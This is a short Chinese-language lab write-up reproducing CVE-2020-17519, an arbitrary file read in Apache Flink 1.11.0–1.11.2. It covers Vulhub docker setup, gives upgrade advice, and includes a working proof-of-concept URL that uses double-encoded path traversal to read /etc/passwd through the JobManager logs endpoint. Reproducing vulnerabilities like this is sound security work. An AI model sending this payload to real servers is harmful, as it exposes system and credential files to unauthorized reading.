简介
Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。
漏洞概述
Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
影响版本
1.11.0、1.11.1、1.11.2
环境搭建
使用vulhub进行安装
Vulhub地址:
https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519
启动Apache Flink jobmanager 1.11.2:
进入目录
cd vulhub-master/flink/CVE-2020-17519
安装环境
docker-compose up -d
然后访问http://your-ip:8081
漏洞复现
Poc
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
读取成功
修复建议
升级到安全版本
安全版本:
Flink 1.11.3或Flink 1.12.0
本文始发于微信公众号(锋刃科技):Apache Flink漏洞(CVE-2020-17519)复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论